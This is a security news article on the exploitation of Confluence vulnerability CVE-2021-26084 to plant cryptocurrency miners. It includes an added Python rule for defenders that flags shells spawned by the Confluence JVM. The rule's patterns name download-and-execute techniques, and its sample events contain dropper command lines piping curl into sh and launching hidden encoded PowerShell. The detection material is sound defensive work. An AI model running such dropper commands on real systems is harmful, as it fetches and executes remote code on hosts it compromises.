Atlassian Confluence vulnerability was exploited to install miners

Atlassian Confluence vulnerability

In late August, Atlassian released a hotfix for a Confluence Remote Code Execution (RCE) vulnerability.

The issue is tracked as CVE-2021-26084 and allows an unauthenticated attacker to remotely execute commands on a vulnerable server.

The issue is reported to affect all versions of Confluence Server and Data Center.

After the patch was released, the researcher who found the vulnerability presented a detailed description of it, attaching a PoC exploit to his report.

"Looking at the shell script it was clear that there were a few *.vm files that were modified with a bit of string match and replace, which implied the vulnerability should lie somewhere inside them. We quickly grabbed the unpatched version (7.12.4) of Confluence Server, unzipped it, and, to be just sure that we understood the patch correctly, we created a copy of the Confluence server and applied the patch script on that copy," said the researcher, who publishes under the pseudonym rootxharsh.

The exploit, written in PHP, turned out to be easy to use and does allow executing commands on the target server. Attackers can use it to upload other malware or web shells, or to launch programs on a vulnerable server.

Shortly after the publication of the report and the exploit, security experts began to report that cybercriminals and information security researchers were actively scanning the Internet for vulnerable Confluence servers. For example, experts at Bad discovered that attackers from different countries were exploiting servers to download and run PowerShell and Linux shell scripts. In this way, attackers install cryptocurrency miners on servers running both Windows and Linux.
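The behaviour described above (the Confluence server process launching shell or PowerShell scripts that fetch and run a miner) leaves a clear trace in process-creation telemetry. The following detection rule is an added example for defenders; it is not from the article, from the researcher, or from Atlassian. It runs over constructed process events whose field names (`pid`, `ppid`, `image`, `cmdline`) are assumptions modelled on a generic EDR or auditd export, and it assumes the Confluence JVM is recognisable by a `java` image with `confluence` in its command line.

```python
"""Flag shells spawned by a Confluence Java process that fetch and run remote code.

Added example (not from the article, rootxharsh, or Atlassian). Event field names and
the download-and-execute patterns are assumptions; the events below are constructed.
"""
import re
from typing import Dict, Iterable, List

# Shells/interpreters whose launch by a web application process is suspicious.
SHELLS = {"sh", "bash", "dash", "powershell.exe", "pwsh.exe", "cmd.exe"}

# Generic download-and-execute patterns typical of opportunistic miner droppers (assumed).
DROPPER_PATTERNS = [
    re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sh|bash)\b", re.I),           # curl http://x | sh
    re.compile(r"\b(curl|wget)\b.*&&\s*(chmod|sh|bash)\b", re.I),         # wget x && chmod +x x
    re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b)", re.I),
    re.compile(r"powershell[^\n]*\s-(enc|encodedcommand|e)\b", re.I),     # encoded PowerShell
    re.compile(r"certutil(\.exe)?\s+-urlcache", re.I),                    # certutil downloader
]


def basename(path: str) -> str:
    """Last path component, handling both '/' and '\\' separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def is_confluence_java(event: Dict[str, str]) -> bool:
    """True if the event's process looks like the Confluence Tomcat JVM (assumption)."""
    return basename(event["image"]) in ("java", "java.exe") and "confluence" in event["cmdline"].lower()


def detect_confluence_droppers(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return findings for shell children of the Confluence JVM whose command line
    matches a download-and-execute pattern. Each finding names the child pid, its
    command line and the first pattern that matched."""
    events = list(events)
    by_pid = {e["pid"]: e for e in events}
    findings: List[Dict[str, str]] = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None or not is_confluence_java(parent):
            continue                       # only care about children of the Confluence JVM
        if basename(e["image"]) not in SHELLS:
            continue                       # Confluence legitimately runs non-shell helpers
        matched = [p.pattern for p in DROPPER_PATTERNS if p.search(e["cmdline"])]
        if matched:
            findings.append({"pid": e["pid"], "cmdline": e["cmdline"], "reason": matched[0]})
    return findings


# Constructed sample events: a Linux and a Windows Confluence JVM, one benign helper,
# one unrelated admin shell, and two dropper-style children (IP from a documentation range).
SAMPLE_EVENTS = [
    {"pid": "1200", "ppid": "1", "image": "/opt/atlassian/confluence/jre/bin/java",
     "cmdline": "java -Dconfluence.home=/var/atlassian/application-data/confluence "
                "org.apache.catalina.startup.Bootstrap start"},
    {"pid": "4412", "ppid": "1200", "image": "/bin/sh",
     "cmdline": "sh -c curl -fsSL http://198.51.100.7/ld.sh | sh"},          # dropper
    {"pid": "4420", "ppid": "1200", "image": "/bin/sh",
     "cmdline": "sh -c git --version"},                                       # benign helper
    {"pid": "900", "ppid": "1", "image": "/usr/bin/bash",
     "cmdline": "bash -c curl -s https://example.com/setup.sh | sh"},        # not from Confluence
    {"pid": "2100", "ppid": "4", "image": "C:\\Program Files\\Atlassian\\Confluence\\jre\\bin\\java.exe",
     "cmdline": "java.exe -Dconfluence.home=C:\\confluence-data org.apache.catalina.startup.Bootstrap start"},
    {"pid": "2150", "ppid": "2100",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},  # dropper
]

if __name__ == "__main__":
    for f in detect_confluence_droppers(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {f['cmdline']}  [matched: {f['reason']}]")
```

The rule keys on the parent/child relationship rather than on any exploit payload, so it also catches post-exploitation from other Confluence bugs; tuning the `SHELLS` set and the patterns against your own baseline of legitimate Confluence child processes is the main deployment step.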

While the attacks currently mostly aim at mining cryptocurrency, the researchers warn that there is no reason attackers would not exploit this vulnerability for other purposes, including more sophisticated attacks. US Cyber Command issued a similar warning and expects the situation to keep deteriorating:

"The massive exploitation of CVE-2021-26084 at Atlassian Confluence continues and [the rate of exploitation] is expected to accelerate. Please fix the vulnerability immediately if you have not already done so; it will not wait until the end of the holidays," Cyber Command representatives warned on Twitter ahead of Labor Day.

Let me also remind you that this Atlassian vulnerability was included in a list of the 15 most attacked Linux vulnerabilities.

By Vladimir Krasnogolovy

Vladimir is a technical specialist who loves giving qualified advice and tips on GridinSoft's products. He's available 24/7 to assist you with any question regarding internet security.
